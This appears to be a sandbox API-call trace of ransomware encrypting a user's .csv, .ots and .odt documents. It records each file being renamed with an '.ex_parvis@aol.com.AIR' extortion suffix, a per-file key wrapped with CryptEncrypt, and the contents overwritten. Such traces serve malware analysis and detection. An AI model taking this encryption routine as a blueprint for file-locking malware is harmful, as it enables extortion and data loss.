	[0106.332] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\t7bkz5.csv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528
	[0106.332] GetProcessHeap () returned 0x540000
	[0106.332] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.332] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=48684) returned 1
	[0106.332] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xbe2c
	[0106.332] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.332] GetProcessHeap () returned 0x540000
	[0106.332] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.332] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.333] WriteFile (in: hFile=0x528, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.334] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.334] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.334] ReadFile (in: hFile=0x528, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xbe2c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xbe2c, lpOverlapped=0x0) returned 1
	[0106.334] SetFilePointer (in: hFile=0x528, lDistanceToMove=-48684, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.334] WriteFile (in: hFile=0x528, lpBuffer=0x6159f0*, nNumberOfBytesToWrite=0xbe2c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6159f0*, lpNumberOfBytesWritten=0x3a1f778*=0xbe2c, lpOverlapped=0x0) returned 1
	[0106.335] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.335] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.335] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv", dwFileAttributes=0x80) returned 1
	[0106.335] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv") returned 81
	[0106.335] GetProcessHeap () returned 0x540000
	[0106.335] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x108) returned 0x598b60
	[0106.335] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv"
	[0106.335] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.335] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\qjtezh2afx7e687y35.csv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\qjtezh2afx7e687y35.csv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.338] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\qjTEZH2afx7e687Y35.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\qjtezh2afx7e687y35.csv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528
	[0106.338] GetProcessHeap () returned 0x540000
	[0106.338] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.338] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=94271) returned 1
	[0106.338] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1703f
	[0106.338] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.338] GetProcessHeap () returned 0x540000
	[0106.338] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.338] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.338] WriteFile (in: hFile=0x528, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.339] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.339] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.339] ReadFile (in: hFile=0x528, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x1703f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x1703f, lpOverlapped=0x0) returned 1
	[0106.340] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.340] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.340] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv", dwFileAttributes=0x80) returned 1
	[0106.341] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv") returned 75
	[0106.341] GetProcessHeap () returned 0x540000
	[0106.341] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8670
	[0106.341] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv"
	[0106.341] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.341] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\pnv6cwvslohl.csv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\pnv6cwvslohl.csv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.343] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\Pnv6CwvSlOhl.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\pnv6cwvslohl.csv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528
	[0106.343] GetProcessHeap () returned 0x540000
	[0106.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.343] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=32047) returned 1
	[0106.343] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x7d2f
	[0106.343] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.343] GetProcessHeap () returned 0x540000
	[0106.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.343] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.344] WriteFile (in: hFile=0x528, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.344] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.344] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.345] ReadFile (in: hFile=0x528, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x7d2f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x7d2f, lpOverlapped=0x0) returned 1
	[0106.345] SetFilePointer (in: hFile=0x528, lDistanceToMove=-32047, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.345] WriteFile (in: hFile=0x528, lpBuffer=0x6118f0*, nNumberOfBytesToWrite=0x7d2f, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6118f0*, lpNumberOfBytesWritten=0x3a1f778*=0x7d2f, lpOverlapped=0x0) returned 1
	[0106.346] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.346] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.346] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots", dwFileAttributes=0x80) returned 1
	[0106.346] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots") returned 69
	[0106.346] GetProcessHeap () returned 0x540000
	[0106.346] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf0) returned 0x598b60
	[0106.346] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots"
	[0106.346] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.346] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\hi6udp.ots"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\hi6udp.ots.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.349] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\hi6UDp.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\hi6udp.ots.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528
	[0106.349] GetProcessHeap () returned 0x540000
	[0106.349] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.349] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=59141) returned 1
	[0106.349] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xe705
	[0106.349] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.349] GetProcessHeap () returned 0x540000
	[0106.349] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.349] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.349] WriteFile (in: hFile=0x528, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.350] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.350] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.350] ReadFile (in: hFile=0x528, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xe705, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xe705, lpOverlapped=0x0) returned 1
	[0106.352] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.352] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.352] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt", dwFileAttributes=0x80) returned 1
	[0106.352] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt") returned 77
	[0106.352] GetProcessHeap () returned 0x540000
	[0106.352] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8670
	[0106.352] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt"
	[0106.352] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.352] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\2wts bo3rty7tu.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\2wts bo3rty7tu.odt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.356] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\2wTS bo3RTy7tu.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\2wts bo3rty7tu.odt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528
	[0106.356] GetProcessHeap () returned 0x540000
	[0106.356] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.356] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=62829) returned 1
	[0106.357] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xf56d
	[0106.357] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.357] GetProcessHeap () returned 0x540000
	[0106.357] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.357] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.357] WriteFile (in: hFile=0x528, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.358] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.358] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.358] ReadFile (in: hFile=0x528, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xf56d, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xf56d, lpOverlapped=0x0) returned 1
	[0106.359] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5daef0
	[0106.359] FindNextFileW (in: hFindFile=0x5daef0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.359] FindNextFileW (in: hFindFile=0x5daef0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0106.359] FindNextFileW (in: hFindFile=0x5daef0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1
